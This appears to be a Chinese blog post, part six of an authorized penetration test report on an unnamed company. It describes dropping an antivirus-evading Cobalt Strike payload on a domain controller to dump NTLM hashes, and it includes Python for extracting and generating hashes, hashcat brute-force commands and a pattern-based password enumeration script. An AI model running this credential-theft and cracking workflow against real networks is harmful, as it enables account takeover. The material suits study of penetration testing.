主页 > 网络知识 > 某企业授权渗透报告(6)

某企业授权渗透报告(6)

 

某企业授权渗透报告

 

上传CS免杀payload到域控服务器,并且执行抓取目标机器用户的NTLM密码哈希值:

 

某企业授权渗透报告

                                                                        本地虚拟机杀毒软件测试

某企业授权渗透报告

某企业授权渗透报告

 

Windows NTLM哈希破解

从Cobalt Strike导出用户的密文文本中进一步提取出NTLM密码哈希值为后面的HashCat破解做准备:

代码:

import re import os if __name__ == '__main__': with open("hashdump.txt", "r") as f: data = f.read().splitlines() f = open("pass.txt",'a+',encoding="utf-8") for i in range(len(data)): password_NTLM = str(data[i]) password = re.findall(r"aad3b435b51404eeaad3b435b51404ee:(.+?):::",password_NTLM) print(password[0]) f.write("{} ".format(password[0])) f.close() print("共计{}".format(len(data)))

提取效果如下:

 

某企业授权渗透报告

 

Hahcat来破解用户的密文哈希值

hashcat64.exe -a 3 -m 1000 --force 密文 --increment --increment-min 8 --increment-max 10 ?a?a?a?a?a?a?a?a?a?a

上面这个指令的意思:-m 代表密文类型;--force 密文 你要破解的密文;--increment-min 8 猜解最小8位,--increment-max 1猜解最大10位的密码 ,?a表示未知密码(涵盖键盘上所有的摁键),?d代表数字、?l代表小写字母、

HashCat具体使用方法请移步先知社区这篇文章(Hashcat的使用手册总结),HashCat比较吃显卡性能。

Demon演示

hashcat64.exe -a 3 -m 1000 --force 209c6174da490caeb422f3fa5a7ae634 --increment --increment-min 4 --increment-max 5 ?l?l?l?l?l

 

某企业授权渗透报告

 

需要更具具体情况去修改密文哈希格式,一般企业的密码都是有规律的,比如google@主机名,这种这种情况可以根据实际情况用python for 循环枚举出全部可能密码,我在之前收集到的信息资产表中,发现了密码格式有一种规律;规律格式为:name@name..主机名 这种格式。name为该公司的拼音,主机名和IP地址的第四段一一对应,开始尝试用python枚举全部密码

def Get(name,kang): f = open("枚举明文密码.txt",'a+',encoding='utf-8') for i in range(1,254): print("{}{}{}{}".format(name,kang,name,i)) f.write("{}{}{}{} ".format(name,kang,name,i)) if __name__ == '__main__': Get(name="google",kang="@")

然后把循环枚举出来的明文密码,通过NTLM方式进行加密成NTLM格式的密码,python实现明文转NTLM_Hash

import hashlib,binascii def NTLM_Hash(password): hash = hashlib.new('md4', password.encode('utf-16le')).digest() print(str(str(binascii.hexlify(hash)).replace("b'", '').replace("'", ''))) if __name__ == '__main__': NTLM_Hash("123456")

 

某企业授权渗透报告

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!